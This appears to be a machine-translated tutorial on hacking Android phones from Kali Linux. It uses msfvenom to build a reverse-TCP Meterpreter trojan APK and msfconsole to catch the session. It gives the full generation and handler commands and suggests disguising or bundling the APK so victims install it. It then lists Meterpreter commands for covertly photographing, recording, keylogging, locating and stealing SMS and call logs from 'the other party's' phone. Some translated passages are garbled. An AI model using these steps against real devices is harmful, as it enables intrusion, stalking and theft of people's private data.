Kali Linux uses MSF to hack Android phones
- 1. What is msf
- Second, the penetration process
- 3. Meterpreter hacks Android phone command
-
- 1. Check the other party's mobile phone system information
- 2. Check which app files are installed on the other party's phone
- 3. Remotely control the other party's mobile phone to take a photo
- 4. Remotely control the other party's mobile phone to start video chat
- 5. View the information of the other party's mobile phone in real time
- 6. Get the address book of the other party's mobile phone
- 7. Obtain the GPS location of the other party's mobile phone in real time
- 8. More commands
1. What is msf
msfvenom a Metasploit standalone payload generator, Also a replacement for msfpayload and msfencode. is the software used to generate backdoors.
MSFvenom is a combination of Msfpayload and Msfencode, putting both tools in a single Framework instance. As of June 8, 2015, msfvenom replaces msfpayload and msfencode.
demo environment
Use Kali 2021.3 for demonstration operation
Target drone: emulator Xiaoyao Android 7.1.2
software: msfvenom , msfconsole (built-in Kali system)
Second, the penetration process
1. Enter administrator mode
Command: sudo su
Explanation: If you do not run in administrator mode, there may be a prompt about insufficient permissions. To avoid command execution failure, run the following command under administrator
Tip: Enter Kali's password after executing the command, the password is hidden, just enter it directly and press Enter
2. Generate executable Trojan files
Command: Example: Explanation: The local ip writes the IP address of your own Kali, and you can use ifconfig to view the IP address of your own Kali. The local port can set a port number that is not occupied. If the port number is occupied, the file will fail to be generated. A port number is just a file name , you can write any name you like, such as writing a free thumbs up, it may be easier for the target host to be hookedmsfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> R > <文件名>.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk
This is the IP address of the Kali host
Next, run the command to generate the Trojan
The default generated files are in the root directory
Put the Android backdoor just generated into the target drone
3. Run the msfconsole command
Order: msfconsole
4. Configuration parameters
(1) Command: use exploit/multi/handler
(Select the module)
(2) Command: set payload android/meterpreter/reverse_tcp
(Select the attack module)
(3) Command: set LhOST 192.168.32.1
(Fill in the IP address of your own host)
(4) Command: set lport 5555
(Fill in the port number when the file was just generated)
(5) Command: show options
(View the setting parameters)
(6) Command: exploit -z -j
(Execute in the background)
After the parameters are set, open the program on the target machine and execute the command in step 6. You can also directly enter the command
exploit
to start the attack. As long as the target machine has the backdoor software installed, any method can be used, and you can directly run the attack to start the attack.
Detailed attack configuration parameter demonstration:
Now wait for the target drone to open the APP
5. Open the executable file on the target machine
We can also disguise the program here, change its icon, or bundle it with some software, and when the user opens it, it will be automatically installed on the other party's computer.
6. View users
(1) Command: sessions
(View the hooked users)
(2) Command: sessions -i 1
(Select the user to be attacked)
Appears
meterpreter
you have successfully invaded successfully
3. Meterpreter hacks Android phone command
1. Check the other party's mobile phone system information
Order: sysinfo
2. Check which app files are installed on the other party's phone
Order: app_list
3. Remotely control the other party's mobile phone to take a photo
Order: webcam_snap
4. Remotely control the other party's mobile phone to start video chat
Order: webcam_chat
5. View the information of the other party's mobile phone in real time
Order: dump_sms
6. Get the address book of the other party's mobile phone
Order: dump_calllog
7. Obtain the GPS location of the other party's mobile phone in real time
Order: geolocate
8. More commands
You can also view the help documentation, command
help
cmd指令:
cat read file contents to screen
cd change directory
checksum retrieve file checksum
cp copy source to destination
del delete specified file
dir list file (alias for ls)
download download file or directory
edit edit file
getlwd print local working directory
getwd print working directory
lcd change local working directory
lls list local file
lpwd print local working directory
ls list file
mkdir create directory
mv move source to destination
pwd print working directory
rm delete specified file
rmdir delete directory
search search file
show_mount list all mounts mount point/logical drive
upload upload file or directory
pkill kill process by name
meterpreter命令:
keyscan_start start capturing keystrokes (start keylogging)
keyscan_dump dump keystroke buffer (download keylogging)
keyscan_stop stop capturing keystrokes (stop keylogging)
record_mic X seconds from the default microphone record_mic audio recording (audio recording)
webcam_chat start video chat (video , the other party will have a pop-up window)
webcam_list single camera (view the camera list)
webcam_snap take a snapshot from the specified camera (camera to take a photo)
webcam_stream play the video stream from the specified camera (open camera monitoring)
enumdesktops List all accessible desktops and window station (list of forms)
getdesktop get current meterpreter desktop
reboot reboot remote computer
shutdown shutdown remote computer
shell put system command shell
enumdesktops list all accessible desktops and window stations
getdesktop get current meterpreter desktop
idletime return remote user Idle seconds
keyboard_send send keystroke
keyevent send keystroke event
keyscan_dump dump keystroke buffer
keyscan_start start capturing keystroke
keyscan_stop stop capturing keystroke
mouse send mouse event
screenshare watch remote user desktop in real time
screenshot take screenshot of interactive desktop
setdesktop change Meterpreters current desktop
uictl control some user interface components
record_mic record audio from default microphone for X seconds
webcam_chat start video chat
webcam_list list webcam
webcam_snap capture from specified webcam Snapshot
webcam_stream Play the video stream from the specified webcam
play Play a wave audio file (.wav) on the target system
getsystem Attempt to elevate your privileges to those of the local system
execute -f notepad Open Notepad
把文件上传到靶机命令
把文件下载到主机命令